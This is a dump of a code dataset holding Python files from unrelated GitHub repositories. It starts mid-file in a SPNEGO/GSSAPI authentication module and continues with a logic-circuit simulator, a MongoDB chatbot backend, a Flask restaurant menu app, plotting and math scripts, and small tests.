gssapi.OID.from_int_seq(_GSS_SPNEGO_REQUIRE_MIC_OID_STRING)\n res = inquire_sec_context_by_oid(self._context, require_mic)\n except GSSError:\n # Not all gssapi mechs implement this OID, the other mechListMIC rules still apply but are calc elsewhere.\n return False\n else:\n return b\"\\x01\" in res\n\n def _convert_iov_buffer(self, iov_buffer): # type: (IOVBuffer) -> Tuple[int, bool, Optional[bytes]]\n buffer_data = None\n buffer_alloc = False\n\n if isinstance(iov_buffer.data, bytes):\n buffer_data = iov_buffer.data\n elif isinstance(iov_buffer.data, int):\n # This shouldn't really occur on GSSAPI but is here to mirror what SSPI does.\n buffer_data = b\"\\x00\" * iov_buffer.data\n else:\n auto_alloc = [BufferType.header, BufferType.padding, BufferType.trailer]\n\n buffer_alloc = iov_buffer.data\n if buffer_alloc is None:\n buffer_alloc = iov_buffer.type in auto_alloc\n\n return iov_buffer.type, buffer_alloc, buffer_data\n\n @wrap_system_error(NativeError, \"NTLM reset crypto state\")\n def _reset_ntlm_crypto_state(self, outgoing=True):\n if self.negotiated_protocol == 'ntlm':\n _gss_ntlmssp_reset_crypto(self._context, outgoing=outgoing)\n","repo_name":"ryanmrestivo/red-team","sub_path":"Exploitation-Tools/CrackMapExec/site-packages/spnego/gss.py","file_name":"gss.py","file_ext":"py","file_size_in_byte":24239,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"39019830451","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 29 17:10:01 2020\r\n\r\n@author: dcr\r\n\"\"\"\r\nfrom .base import Logic\r\nfrom .logic import Not\r\nfrom .logic import Mux2\r\nfrom .base import Wire\r\n\r\nclass Reg(Logic):\r\n \"\"\"\r\n This is a D flip flop\r\n \"\"\"\r\n def __init__(self, parent, name:str, d:Wire, e:Wire, q:Wire, ):\r\n super().__init__(parent, name)\r\n self.d = self.addIn(\"d\", d)\r\n self.e = self.addIn(\"e\", e)\r\n self.q = self.addOut(\"q\", q)\r\n self.value = 0\r\n \r\n def clock(self):\r\n if (self.e.get() & 1):\r\n self.value = self.d.get()\r\n self.q.prepare(self.value)\r\n \r\n #print(self.name, 'sel', self.e.get(), self.d.get(), 'value prepared=', self.value)\r\n \r\n port = self.d.getSource()\r\n #print('d source', port.name, port.parent.getFullPath())\r\n else:\r\n #maintain the same value\r\n self.q.prepare(self.value)\r\n \r\n \r\n \r\nclass TReg(Logic):\r\n def __init__(self, parent, name:str, t:Wire, e:Wire, q:Wire, ):\r\n super().__init__(parent, name)\r\n self.t = self.addIn(\"t\", t)\r\n self.e = self.addIn(\"e\", e)\r\n self.q = self.addOut(\"q\", q)\r\n \r\n nq = self.wire('nq', 1)\r\n Not(self, 'nq', q, nq)\r\n \r\n d = self.wire('d', 1)\r\n Mux2(self, 'mux', t, q, nq, d)\r\n Reg(self, 'reg', d, e, q)\r\n ","repo_name":"b-aravind99/py4hw","sub_path":"py4hw/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"13964793678","text":"from flask import jsonify\nfrom pymongo import ReturnDocument, MongoClient # so that we can return the updated version of the document after updating it\nfrom bson.objectid import ObjectId\nfrom datetime import datetime # so that we can add a date that a statistic was added\ndate_time_format = '%Y-%m-%d %H:%M:%S' # we format datetime as YYYY-MM-DD HH:MM:SS\n\ndef get_intents():\n return jsonify(intents=[\n {\n 'tag':'test',\n 'patterns':['test1', 'test2', 'test3'],\n 'responses':['Oh hey, nice test!'],\n 'context':[]\n }\n ])\n\ndef return_all(mongo, Collection = 'questions'):\n found = mongo.db[Collection].find({})\n \n if (found is None): # if it comes back empty\n return jsonify({'result':'no results'})\n\n list = []\n for i in found: # itt=erate over cursor \n fickleID = i.pop('_id') # jsonify() doesn't know how to handle objects of type ObjectID, so we remove it\n i.update({'_id': str(fickleID)}) # put _id back in but as a regular string now\n list.append(i)\n\n return list #return result \n\ndef add_question(mongo, question):\n exists, q_name = check_question_exists(mongo, '', question['tags'])\n\n if exists:\n return None, q_name\n \n new_question = question\n # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n InsertOneResult_Obj = mongo.db.questions.insert_one(new_question)\n # append new_question with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n new_question.update({'_id':str(InsertOneResult_Obj.inserted_id)}) \n \n return new_question, ''\n\n\ndef update_question(mongo, id, update_dict):\n exists, q_name = check_question_exists(mongo, id, update_dict['tags'])\n\n if exists:\n return None, q_name\n\n if 'contact' not in update_dict:\n remove_one_field(mongo, id, 'contact')\n\n if 'follow-up' not in update_dict:\n remove_one_field(mongo, id, 'follow-up')\n\n updated = mongo.db.questions.find_one_and_update(\n {\n '_id': ObjectId(id)\n }, \n {\n '$set': update_dict\n },\n upsert=False, # upsert = if thing does not exist, make it exist\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n )\n if (updated is None): # if there is no match\n return None, ''\n \n fickleID = updated.pop('_id') # jsonify() doesn't know how to handle objects of type ObjectID, so we remove it\n updated.update({'_id': str(fickleID)}) # put _id back in but as a regular string now\n\n return updated, ''\n\ndef update_question_follow_ups(mongo, follow_id, new_name):\n mongo.db.questions.find_many_and_update(\n {\n 'follow-up._id': follow_id\n },\n {\n '$set': {'follow-up.name':new_name}\n }\n )\n\n\ndef check_question_exists(mongo, id, tags):\n result = mongo.db.questions.find_one({\n \"tags\" : {\n \"$all\":tags\n }\n })\n if result is None:\n return False, ''\n else:\n check = result['_id']\n if str(check) != id:\n return True, result['name']\n return False, ''\n\ndef delete_question(mongo, id):\n result = mongo.db.questions.delete_one({'_id':ObjectId(id)})\n if result.deleted_count == 1:\n return True, 'Question successfully deleted'\n else:\n return False, 'Question could not be found'\n\n\ndef add_tag(mongo, name, type):\n new_tag = {'name': name, 'type': type} # we make sure all tags are lower case\n if (check_tag_exists(mongo, name, type)):\n return None\n \n InsertOneResult_Obj = mongo.db.tags.insert_one(new_tag) # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n \n new_tag.update({'_id':str(InsertOneResult_Obj.inserted_id)}) # append new_question with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n \n return new_tag\n\ndef check_tag_exists(mongo, name, type):\n result = mongo.db.tags.find_one({\n \"name\": name,\n \"type\": type\n })\n return result is not None\n\n\ndef update_tag(mongo, old_dict, update):\n updated = mongo.db.tags.find_one_and_update(\n {\n '_id': ObjectId(old_dict['_id'])\n }, \n {\n '$set': update\n },\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n )\n if (updated is None): #if there is no match\n return None\n\n fickleID = updated.pop('_id') # jasonify() doesn't know how to handle objects of type ObjectID, so we remove it\n updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n return_all_with_tag(mongo, old_dict['name'], old_dict['type'], update['name'])\n\n return updated\n\ndef delete_tag(mongo, id, name, type):\n element = -1\n if (type == 'intent'):\n element = 0\n elif (type == 'department'):\n element = 1\n elif (type == 'category'):\n element = 2\n elif (type == 'information'):\n element = 3\n else:\n return False, 'Tag has invalid type'\n\n # if no question is using this tag, we may delete it:\n found = mongo.db.questions.find({'tags.'+str(element):name}) \n if (found.count() == 0):\n to_delete = mongo.db.tags.delete_one({'_id':ObjectId(id)})\n if (to_delete.deleted_count == 0): #if there is no match\n return False, 'Tag could not be found'\n else:\n return True, 'Tag successfully deleted'\n else:\n return False, 'Tag has dependent questions'\n\ndef check_valid_user(mongo, nid):\n result = mongo.db.users.find_one({\n \"NID\":nid\n })\n if result is None:\n return False, False\n elif result['IsAdmin']:\n return True, True\n else:\n return True, False\n\ndef add_user(mongo, user):\n new_user = user\n \n InsertOneResult_Obj = mongo.db.users.insert_one(new_user) # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n\n if new_user is None:\n return None\n \n new_user.update({'_id':str(InsertOneResult_Obj.inserted_id)}) # append new_question with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n \n return new_user\n\ndef update_user(mongo, id, NID, name, email, IsAdmin):\n updated = mongo.db.users.find_one_and_update(\n {\n '_id': ObjectId(id)\n }, \n {\n '$set': { 'NID':NID, 'name':name, 'email':email, 'IsAdmin':IsAdmin}\n },\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n )\n if (updated is None): #if there is no match\n return None\n\n fickleID = updated.pop('_id') # jasonify() doesn't know how to handle objects of type ObjectID, so we remove it\n updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n return updated\n\ndef delete_user(mongo, id):\n to_delete = mongo.db.users.delete_one(\n {\n '_id':ObjectId(id)\n }\n )\n if (to_delete.deleted_count == 0): #if there is no match\n return False, 'User not found.'\n \n return True, 'User successfully deleted.'\n\n# def add_link(mongo, name, url):\n# new_link = {'name': name, 'url':url}\n \n# InsertOneResult_Obj = mongo.db.links.insert_one(new_link) # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n \n# new_link.update({'_id':str(InsertOneResult_Obj.inserted_id)}) # append new_question with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n \n# return new_link\n\n# def update_link(mongo, id, update):\n# updated = mongo.db.links.find_one_and_update(\n# {\n# '_id': ObjectId(id)\n# }, \n# {\n# '$set': update\n# },\n# return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n# )\n# if (updated is None): #if there is no match\n# return None\n\n# fickleID = updated.pop('_id') # jasonify() doens't know how to handle objects of type ObjectID, so we remove it\n# updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n# return updated\n\n# def delete_link(mongo, id):\n# # if no question is using this link, we may delete it immediately:\n# found = mongo.db.questions.find({'links._id':id}) # assumes questions link to link via _id stored as a string\n \n# to_delete = mongo.db.links.delete_one(\n# {\n# '_id':ObjectId(id)\n# }\n# )\n# if (to_delete.deleted_count == 0): #if there is no match\n# return False, 'Could not find Link.'\n# if (found.count() > 0): # if it is being used, delete every instance\n# for i in found: # itterate over curor \n# remove_one_element(mongo, str(i['_id']), id, 'links._id')\n\n# return True, 'Link successfully deleted'\n\n\ndef remove_one_element(mongo, id_of_question_with_array, id_of_element, array_name):\n found = mongo.db.questions.find_one_and_update( \n {\n '_id':ObjectId(id_of_question_with_array)\n }, \n {\n '$pull' : {array_name : id_of_element}\n },\n return_document=ReturnDocument.AFTER\n )\n if (found is None): # if there is no match\n return None\n\n if not found[array_name]: # delete the whole links field if the deletion makes it empty\n remove_one_field(mongo, id_of_question_with_array, array_name)\n\n fickleID = found.pop('_id') # jasonify() doens't know how to handle objects of type ObjectID, so we remove it\n found.update({'_id': str(fickleID)}) # put _id back in but as a regular string now\n\n return found #return result as json\n\n\ndef remove_one_field(mongo, id_of_question_with_field, field): # tags = ['beep boop', 'noop', 'yoop', 'ploop'], field = 'related questions'\n found = mongo.db.questions.find_one_and_update( \n {\n '$and': [\n {'_id':ObjectId(id_of_question_with_field)},#{'tags': { '$all': [x.lower() for x in tags] }},\n {field: {'$exists': True} }\n ]\n }, \n {\n '$unset': { field:\"\" }\n },\n return_document=ReturnDocument.AFTER\n )\n if (found is None): # if there is no match\n return None\n\n fickleID = found.pop('_id') # jasonify() doens't know how to handle objects of type ObjectID, so we remove it\n found.update({'_id': str(fickleID)}) # put _id back in but as a regular string now\n\n return found #return result as json\n\n\ndef add_contact(mongo, contact):\n new_contact = contact\n \n InsertOneResult_Obj = mongo.db.contacts.insert_one(new_contact) # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n \n new_contact.update({'_id':str(InsertOneResult_Obj.inserted_id)}) # append new_question with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n \n return new_contact\n\n\ndef update_contact(mongo, id, update):\n\n found = mongo.db.questions.find({'contact._id':id})\n\n if found.count() != 0:\n mongo.db.questions.update_many(\n {\n 'contact._id':id\n },\n {\n '$set': {\n 'contact.title':update['title'],\n 'contact.name':update['name'],\n 'contact.email':update['email']\n }\n }\n )\n\n updated = mongo.db.contacts.find_one_and_update(\n {\n '_id': ObjectId(id)\n }, \n {\n '$set': update\n } if 'departments' in update else { # if the updated contact doesn't have a departments array, remove it\n '$set': update,\n '$unset': {'departments':''}\n },\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n )\n if (updated is None): #if there is no match\n return None\n\n fickleID = updated.pop('_id') # jasonify() doens't know how to handle objects of type ObjectID, so we remove it\n updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n return updated\n\n\ndef delete_contact(mongo, id):\n # if no question is using this contact, we may delete it immediately:\n found = mongo.db.questions.find({'contact._id':id}) # assumes questions link to link via _id stored as a string\n \n if (found.count() != 0): # if it is being used, delete every instance\n for i in found: # itterate over curor \n remove_one_field(mongo, str(i['_id']), 'contact')\n\n to_delete = mongo.db.contacts.delete_one(\n {\n '_id':ObjectId(id)\n }\n )\n if (to_delete.deleted_count == 0): #if there is no match\n return False, 'Could not find Contact.'\n else:\n return True, 'Contact successfully deleted'\n\n\n# Order for Tags:\n# 1. Intent (intents)\n# 2. Department (dept)\n# 3. Category (cat)\n# 4. Information (info)\n\n# update all questions in the database with this tag\ndef return_all_with_tag(mongo, tag, type, replace):\n element = -1\n if (type == 'intents'):\n element = 0\n elif (type == 'dept'):\n element = 1\n elif (type == 'cat'):\n element = 2\n elif (type == 'info'):\n element = 3\n else:\n return jsonify({'result':'incorrect type. valid types: intents, dept, cat, info'})\n\n found = mongo.db.questions.update_many(\n {\n 'tags.'+str(element):tag\n },\n {\n '$set': { 'tags.'+str(element):replace } \n },\n upsert=False, # upsert = if thing does not exist, make it exist\n )\n \n if (found is None): # if it comes back empty\n return jsonify({'result':'no results'})\n\n return found.acknowledged # update_many doesn't return a document\n\ndef needs_update_check(mongo):\n found = mongo.db.settings.find_one({'name':'needs training'}) \n\n if (found is None): # if there is no match\n return None\n\n return found['needs training'] #return result setting\n\ndef set_needs_update(mongo, value='Needs Training'):\n updated = mongo.db.settings.find_one_and_update(\n {'name':'needs training'}, \n {\n '$set': { 'needs training':value }\n },\n upsert=False, # upsert = if thing does not exist, make it exist\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n )\n if (updated is None): #if there is no match\n return False\n\n return True\n\n\ndef form_response(mongo, answered, rating, simplicity):\n if answered == \"yes\":\n new_form_response = {'answered': True, 'rating': int(rating), 'simplicity': int(simplicity), 'date/time added': datetime.utcnow() }\n else: \n new_form_response = {'answered': False, 'rating': int(rating), 'simplicity': int(simplicity), 'date/time added': datetime.utcnow() }\n \n InsertOneResult_Obj = mongo.db.form_responses.insert_one(new_form_response) # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n \n new_form_response.update({'_id':str(InsertOneResult_Obj.inserted_id)}) # append new_stat with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n \n return new_form_response,''\n\ndef add_unseen(mongo, question):\n new_question = {'question':question, 'date/time added': datetime.utcnow(), 'resolved': False, \"date/time resolved\": None}\n result = mongo.db.unanswered.find_one({\n \"question\": question\n })\n if result is None:\n InsertOneResult_Obj = mongo.db.unanswered.insert_one(new_question) # insert_one() doesn't return a document, it returns a result that contains the ObjectID\n new_question.update({'_id':str(InsertOneResult_Obj.inserted_id)}) # append new_question with the ObjectID (as a string) so that we can actually return something that resembles a document :/\n return \"question was added\"\n else:\n return \"question already exists\"\n \ndef inc_num_of_questions_asked(mongo):\n updated = mongo.db.statistics.find_one_and_update(\n {\n 'statistic':'number of questions asked'\n }, \n {\n '$inc': { 'count': 1 } \n },\n upsert=False, # upsert = if thing does not exist, make it exist\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n )\n if (updated is None): #if there is no match\n return jsonify({'result':'no match'})\n\n fickleID = updated.pop('_id') # jasonify() doesn't know how to handle objects of type ObjectID, so we remove it\n updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n return jsonify(updated)\n\ndef inc_num_questions_answered_correctly(mongo):\n updated = mongo.db.statistics.find_one_and_update(\n {\n 'statistic':'number of questions answered correctly'\n }, \n {\n '$inc': { 'count': 1 } \n },\n upsert=False, # upsert = if thing does not exist, make it exist\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n )\n if (updated is None): #if there is no match\n return jsonify({'result':'no match'})\n\n fickleID = updated.pop('_id') # jasonify() doesn't know how to handle objects of type ObjectID, so we remove it\n updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n return jsonify(updated)\n\ndef inc_num_times_referred_to_advisor():\n updated = mongo.db.statistics.find_one_and_update(\n {\n 'statistic':'number of times referred to advisor'\n }, \n {\n '$inc': { 'count': 1 } \n },\n upsert=False, # upsert = if thing does not exist, make it exist\n return_document=ReturnDocument.AFTER # need this or else it returns the document from before the update\n )\n if (updated is None): #if there is no match\n return jsonify({'result':'no match'})\n\n fickleID = updated.pop('_id') # jasonify() doesn't know how to handle objects of type ObjectID, so we remove it\n updated.update({'_id':str(fickleID)}) # put _id back in but as a regular string now\n\n return jsonify(updated)\n\ndef get_contact(mongo):\n contact = mongo.db.contacts.find_one({\"title\": \"Undergraduate Coordinator\"})\n if contact is None:\n return jsonify({\"result\": \"no match\"})\n \n fickleID = contact.pop('_id') \n contact.update({'_id':str(fickleID)})\n return jsonify(contact)","repo_name":"ucfcs/ucf-ai-advising-chatbot","sub_path":"backend/src/database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":17572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31098245647","text":"from pylab import plt, np\nimport os\n\nimport backup\n\n\ndef profits_over_distance(\n file_name, folder=None, separate_A_and_B=True):\n\n if folder is None:\n folder = \"data/figures\"\n\n os.makedirs(folder, exist_ok=True)\n\n pool_backup = backup.PoolBackup.load(file_name=file_name)\n\n parameters = pool_backup.parameters\n backups = pool_backup.backups\n\n n_simulations = parameters.n_simulations\n\n # Containers\n x = np.zeros(n_simulations)\n y = np.zeros((2, n_simulations))\n\n for i, b in enumerate(backups):\n\n # Compute the mean distance between the two firms\n data = np.absolute(\n b.positions[:, 0] -\n b.positions[:, 1]) / parameters.n_positions\n\n spacing = np.mean(data)\n x[i] = spacing\n\n # Get profits\n profit_max = parameters.n_positions * parameters.n_prices * parameters.unit_value\n for f in range(2):\n y[f, i] = np.mean(b.profits[:, f]) / profit_max\n\n # Plot this\n fig = plt.figure(figsize=(10, 6))\n ax = plt.subplot()\n\n # ax.set_xlim(-0.01, 1.01)\n # ax.set_ylim(-0.01, 0.51)\n\n ax.set_xticks(np.arange(0, 1.1, 0.25))\n ax.set_yticks(np.arange(0, 0.51, 0.1))\n\n add_title_and_labels(ax)\n add_comment_with_file_name(fig=fig, file_name=file_name)\n\n if separate_A_and_B is True:\n ax.scatter(x, y[0], zorder=10, alpha=0.25, label=\"Firm A\")\n ax.scatter(x, y[1], zorder=10, alpha=0.25, label=\"Firm B\")\n add_fitting_curve(ax=ax, x=x, y=y[0])\n add_fitting_curve(ax=ax, x=x, y=y[1])\n plt.legend()\n\n else:\n ax.scatter(x, np.mean(y, axis=0), zorder=10, alpha=0.25, color=\"black\")\n\n plt.tight_layout()\n\n if file_name:\n plt.savefig(\"{}/{}_profits_over_distance.pdf\".format(folder, file_name))\n\n plt.show()\n\n\ndef add_comment_with_file_name(fig, file_name):\n plt.text(0.005, 0.005, file_name, transform=fig.transFigure, fontsize='x-small', color='0.5')\n\n\ndef add_fitting_curve(ax, x, y):\n\n from scipy.optimize import least_squares\n\n def model(x, u):\n return x[0] * (u ** 2 + x[1] * u) / (u ** 2 + x[2] * u + x[3])\n\n def fun(x, u, y):\n return model(x, u) - y\n\n order = np.argsort(x)\n\n xdata = x[order]\n ydata = y[order]\n\n x0 = np.zeros(4)\n\n res = least_squares(fun, x0, bounds=(-1, 100), args=(xdata, ydata), verbose=1).x\n\n u_test = np.linspace(0, 1)\n ax.plot(u_test, model(res, u_test), '--', zorder=-10)\n\n\ndef add_title_and_labels(ax):\n\n ax.set_xlabel(\"Mean distance\")\n ax.set_ylabel(\"Mean profits\")\n\n ax.set_title(\"Profits over distance\")\n\n","repo_name":"AurelienNioche/HotellingBathtub","sub_path":"analysis/pool/profits_over_distance.py","file_name":"profits_over_distance.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13735299015","text":"from api import is_factor, reject, fst, range_, apply, filter_, also, inc, each, len_, lt, \\\n compress, thenEach, append, is_mult, until, eq, snd\n\nfactors = also(inc) | each( [is_factor, range_(1)]) | apply(filter_)\n\nis_prime = factors | len_ | lt(3)\n\nprimes_naive = range_(2) | filter_(is_prime) | compress\n\nnext_prime = thenEach(fst | fst, [lambda x, xs: reject(is_mult(x), xs), append] )\nprimes_sieve_of_erosthenes = lambda n: until(\n fst | eq([]),\n next_prime,\n [range_(2, n), []]\n) | snd\n\n\ndef primes_imperative(n):\n primes = []\n candidates = range(2, n)\n while candidates:\n next_prime = candidates[0]\n candidates = [x for x in candidates if not x % next_prime == 0]\n primes.append(next_prime)\n return primes","repo_name":"KayaLuken/pype","sub_path":"projectEuler/_3_prime_factors.py","file_name":"_3_prime_factors.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4813370816","text":"import os\n\nfrom configparser import ConfigParser\nfrom flask import (flash,\n Flask,\n jsonify,\n redirect,\n render_template,\n request,\n url_for)\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Restaurant, MenuItem\n\n\nconfig = ConfigParser()\nconfig.read('config.ini')\nHOST = config['MYSQL']['host']\nUSERNAME = config['MYSQL']['username']\nPASSWORD = config['MYSQL']['password']\nDB = config['MYSQL']['name']\n\napp = Flask(__name__)\nengine = create_engine('mysql://%s:%s@%s/%s' % (USERNAME, PASSWORD, HOST, DB))\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n@app.route('/')\n@app.route('/restaurants')\ndef showRestaurants():\n restaurants = session.query(Restaurant).all()\n return render_template('restaurants.html', restaurants=restaurants)\n\n@app.route('/restaurant/new', methods=['GET', 'POST'])\ndef newRestaurant():\n if request.method == 'POST':\n new_restaurant = Restaurant(name=request.form['name'],\n description=request.form['description'])\n session.add(new_restaurant)\n session.commit()\n flash(\"A new restaurant is created!\")\n return redirect(url_for('showRestaurants'))\n else:\n return render_template('newrestaurant.html')\n\n@app.route('/restaurant//edit', methods=['GET', 'POST'])\ndef editRestaurant(restaurant_id):\n edited_restaurant = session.query(Restaurant).filter_by(id=restaurant_id) \\\n .one()\n if request.method == 'POST':\n if request.form['name']:\n edited_restaurant.name = request.form['name']\n session.add(edited_restaurant)\n session.commit()\n flash(\"Restaurant has been edited\")\n return redirect(url_for('showRestaurants'))\n if request.form['description']:\n edited_restaurant.description = request.form['description']\n session.add(edited_restaurant)\n session.commit()\n flash(\"Restaurant has been edited\")\n return redirect(url_for('showRestaurants'))\n else:\n return render_template(\n 'editrestaurant.html', restaurant_id=restaurant_id,\n restaurant=edited_restaurant)\n\n@app.route('/restaurant//delete', methods=['GET', 'POST'])\ndef deleteRestaurant(restaurant_id):\n restaurant_to_delete = session.query(Restaurant) \\\n .filter_by(id=restaurant_id).one()\n if request.method == 'POST':\n session.delete(restaurant_to_delete)\n session.commit()\n flash(\"Restaurant has been deleted\")\n return redirect(url_for('showRestaurants'))\n else:\n return render_template('deleterestaurant.html',\n restaurant=restaurant_to_delete)\n\n@app.route('/restaurants/JSON')\ndef showRestaurantsJSON():\n restaurants = session.query(Restaurant).all()\n return jsonify(Restaurants=[restaurant.serialize\n for restaurant in restaurants])\n\n@app.route('/restaurants//menu/JSON')\ndef restaurantMenuJSON(restaurant_id):\n restaurant = session.query(Restaurant).filter_by(id=restaurant_id).one()\n items = session.query(MenuItem).filter_by(\n restaurant_id=restaurant_id).all()\n return jsonify(MenuItems=[i.serialize for i in items])\n\n# JSON ENDPOINT\n@app.route('/restaurants//menu//JSON')\ndef menuItemJSON(restaurant_id, menu_id):\n menu_item = session.query(MenuItem).filter_by(id=menu_id).one()\n return jsonify(MenuItem=menu_item.serialize)\n\n@app.route('/')\n@app.route('/restaurants//')\ndef restaurantMenu(restaurant_id):\n restaurant = session.query(Restaurant).filter_by(id=restaurant_id).one()\n items = session.query(MenuItem).filter_by(restaurant_id=restaurant_id)\n return render_template('menu.html', restaurant=restaurant, items=items)\n\n@app.route('/restaurants//new', methods=['GET', 'POST'])\ndef newMenuItem(restaurant_id):\n if request.method == 'POST':\n new_item = MenuItem(name=request.form['name'],\n description=request.form['description'],\n price=request.form['price'],\n course=request.form['course'],\n restaurant_id=restaurant_id)\n session.add(new_item)\n session.commit()\n flash(\"A new menu item is created!\")\n return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))\n else:\n return render_template('newmenuitem.html', restaurant_id=restaurant_id)\n\n@app.route('/restaurants///edit',\n methods=['GET', 'POST'])\ndef editMenuItem(restaurant_id, menu_id):\n edited_item = session.query(MenuItem).filter_by(id=menu_id).one()\n if request.method == 'POST':\n if request.form['name']:\n edited_item.name = request.form['name']\n session.add(edited_item)\n session.commit()\n flash(\"Menu Item has been edited\")\n return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))\n else:\n return render_template('editmenuitem.html',\n restaurant_id=restaurant_id,\n menu_id=menu_id,\n item=edited_item)\n\n@app.route('/restaurants///delete',\n methods=['GET', 'POST'])\ndef deleteMenuItem(restaurant_id, menu_id):\n item_to_delete = session.query(MenuItem).filter_by(id=menu_id).one()\n if request.method == 'POST':\n session.delete(item_to_delete)\n session.commit()\n flash(\"Menu Item has been deleted\")\n return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))\n else:\n return render_template('deleteconfirmation.html', item=item_to_delete)\n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n","repo_name":"OlhaLesk/Restaurant_flask","sub_path":"restaurant.py","file_name":"restaurant.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9164077111","text":"import streamlit as st\nimport pandas as pd\n\nst.title(\"Abalano dataset\")\n\nlength = st.number_input(\"length\")\ndiameter = st.number_input(\"diameter\")\nheight = st.number_input(\"height\")\nwhole_weight = st.number_input(\"whole_weight\")\nshucked_weight = st.number_input(\"shucked_weight\")\nviscera_weight = st.number_input(\"viscera_weight\")\nshell_weight = st.number_input(\"shell weight\")\nrings = st.number_input(\"rings\")\n\ndictionary = {\n'length' : length,\n'diameter' : diameter,\n'height' : height,\n'whole_weight' : whole_weight,\n'shucked_weight' : shucked_weight,\n'viscera_weight' : viscera_weight,\n'shell_weight' : shell_weight,\n'rings' : rings\n}\ndata = pd.DataFrame(data=dictionary, index=[0])\nst.dataframe(data)\n\n\nif st.button(\"Model run\"):\n import pickle\n model = pickle.load(open(\"../model/model.pkl\", \"rb\"))\n st.write(f\"The ouput of the Model :- {model.predict(data.values)[0]}\")","repo_name":"CodeNetra-official/ProTon-batch-1","sub_path":"Abalone/app_backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6617424517","text":"\"\"\"A module for configuring database through SQLAlchemy.\"\"\"\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom . import db_models\n\n# database connection string.\nSQLALCHEMY_DB_URL = \"sqlite:///.blog.db\"\n\n# creating engine ie. connecting with db engine.\nengine = create_engine(SQLALCHEMY_DB_URL, connect_args={\"check_same_thread\": False})\n\n# creating tables.\n# db_models.Base.metadata.create_all(bind=engine)\n\n# creating session factory binded to engine.\nsession_factory = sessionmaker(bind=engine, autocommit=False, autoflush=False)\n\n# session mannager function\ndef get_session():\n session = session_factory()\n try:\n yield session\n finally:\n session.close()","repo_name":"Kiran-Sawant/learning-FastAPI","sub_path":"blog/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25896307593","text":"# -*- coding: utf-8 -*-\r\n\r\ndef test_bot_error():\r\n \"test if Annnounce works as it should\"\r\n\r\n from gbot.action import url_map\r\n from gbot.models import Player, Room\r\n\r\n fareko = Player.get(login = 'fareko')\r\n room = Room.get(name = \"0SPL-Allstars Slaves Room\")\r\n\r\n action = url_map['!ann'](player = fareko, room = room, param_string = 'yay!')\r\n action()\r\n\r\n assert len(action.announces) == 1\r\n assert len(action.privates) == 0\r\n\r\n assert action.announces[0] == u\"fareko => yay!\"\r\n","repo_name":"tony-brewerio/ggbot-old","sub_path":"test/test_action_announce.py","file_name":"test_action_announce.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34832210443","text":"from unittest.mock import patch\n\nfrom django.test import TestCase, override_settings\n\nfrom .. import tasks\nfrom . import create_owner\nfrom .testdata.load_entities import load_entities\nfrom .testdata.load_eveuniverse import load_eveuniverse\nfrom .testdata.load_locations import load_locations\n\nTASKS_PATH = \"blueprints.tasks\"\n\n\n@override_settings(CELERY_ALWAYS_EAGER=True)\nclass TestUpdateBlueprints(TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n super().setUpClass()\n load_entities()\n load_eveuniverse()\n load_locations()\n cls.owner = create_owner(character_id=1101, corporation_id=2101)\n\n @patch(TASKS_PATH + 